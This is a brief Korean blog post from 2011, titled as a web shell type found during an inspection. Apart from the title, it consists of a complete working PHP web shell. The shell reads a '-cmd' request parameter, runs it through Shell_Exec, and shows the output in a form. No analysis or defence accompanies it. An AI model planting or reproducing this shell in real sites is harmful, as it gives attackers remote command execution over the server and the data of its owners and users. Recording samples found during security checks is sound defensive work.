php

점검중 발견한 웹셀 유형

duraboys 2011. 1. 10. 16:13
<? $cmd= $_REQUEST["-cmd"]; ?>
\
<? $cmd=str_replace(";;","\\",$cmd); ?>
\
<html><title><?=$cmd?></title><body onLoad="document.forms[0].elements[-cmd].focus()">
\
<form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
\
<hr><pre> <? if($cmd !="") print Shell_Exec($cmd); ?></pre></form></body></html>
\